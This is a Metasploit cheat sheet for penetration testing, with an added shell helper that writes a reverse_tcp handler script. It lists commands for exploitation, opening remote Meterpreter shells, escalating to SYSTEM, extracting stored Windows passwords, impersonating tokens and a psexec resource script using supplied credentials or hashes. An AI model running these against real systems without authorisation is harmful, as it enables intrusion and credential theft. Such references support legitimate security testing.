Metasploit Framework (MSF)

Metasploit: the world’s most used penetration testing framework.

Start

Start db

msfdb start

or

systemctl start postgresql

Start metasploit framework console

msfconsole

Exploits

Select exploit

use <exploit>

Run exploit

run

or

exploit

Options

Show options

show options

Show advanced options

show advanced

Set option

set <option> <value>

Set option (global)

setg <option> <value>

Payloads

Show payloads

show payloads

Select payload

set payload <payload>

Sessions

Show sessions

sessions -l

Interact with session

sessions <number>

Send session to background

background

Meterpreter

The shell command will present you with a standard shell on the target system.

shell

Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system.

getsystem

Encoders

Show encoders

show encoders

Select encoder

set encoder <encoder>

Misc

Search for exploits

search <term>

Go back

back

Display help

help

Get info about the current module

info

Show auxiliary modules

show auxiliary

Multi/handler

Just start a listener (no exploit module)

use exploit/multi/handler

Jobs

Start job in background

run -j

Show jobs

jobs

Post exploitation

This module suggests local exploits that can be used from the current Meterpreter session.

use post/multi/recon/local_exploit_suggester

This module extracts the plain-text Windows user login (AutoLogon) password stored in the registry.

use post/windows/gather/credentials/windows_autologin

This module will login with the specified username/password and execute the supplied command as a hidden process.

use post/windows/manage/run_as

Meterpreter session

Upgrade shell to meterpreter shell

use post/multi/manage/shell_to_meterpreter

Migrate to another (e.g. more stable) process

migrate

Get system info

sysinfo

Port forwarding

portfwd add -l <local-port> -p <remote-port> -r 127.0.0.1

Impersonation (Windows)

Look for privileges like SeImpersonatePrivilege, SeDebugPrivilege, etc. (run in a shell on the target)

whoami /priv

Load incognito module and list available tokens

load incognito
list_tokens -g

Impersonate e.g. BUILTIN\Administrators (the backslash must be doubled inside the Meterpreter string)

impersonate_token "BUILTIN\\Administrators"

Migrate into a process that already runs with the desired permissions; impersonating a token alone does not grant them (token != permission).

ps
migrate <pid>

Resource Scripts

Resource scripts provide an easy way for you to automate repetitive tasks in Metasploit.

msfconsole -r demo.rc

demo.rc

use exploit/windows/smb/psexec
set rhost <ip>
set smbuser Administrator
set smbpass <hash-or-password>
set smbdomain <domain>
set payload windows/meterpreter/reverse_tcp
set AutoRunScript post/windows/manage/smart_migrate
setg lport 443
setg lhost <own-ip>
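The following is an added example, not part of the original cheat sheet. It combines the Multi/handler, Jobs and Resource Scripts sections: a small POSIX shell helper writes a second resource script, handler.rc, that starts a reverse_tcp listener as a background job, so the console stays usable while sessions arrive. The LHOST/LPORT values in the usage lines are constructed placeholders; msfconsole itself is not invoked by the helper.

```shell
#!/bin/sh
# Added example (not from the original page): generate a handler.rc resource
# script for exploit/multi/handler. Replace the LHOST/LPORT arguments with
# your own listener address; the values shown in the usage comment are made up.

# write_handler_rc OUTFILE LHOST LPORT -> writes the resource script to OUTFILE
write_handler_rc() {
    outfile="$1"
    lhost="$2"
    lport="$3"
    cat > "$outfile" <<EOF
# handler.rc - start a listener for a windows/meterpreter/reverse_tcp payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost $lhost
set lport $lport
# keep the handler running after the first session connects
set ExitOnSession false
# run as a background job so the console stays usable (see "Jobs" above)
run -j
EOF
}

# rc_line_count FILE -> number of non-comment, non-empty lines, as a sanity
# check that the script contains every expected msfconsole command
rc_line_count() {
    grep -v '^#' "$1" | grep -c .
}

# Usage:
#   write_handler_rc handler.rc 10.0.0.5 443   # 10.0.0.5 is a placeholder
#   msfconsole -q -r handler.rc                # -q suppresses the banner
```

Once the listener is up, `jobs` lists it and `sessions -l` shows the sessions it has accepted; `setg lhost`/`setg lport` from demo.rc apply to a handler started later in the same console as well.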
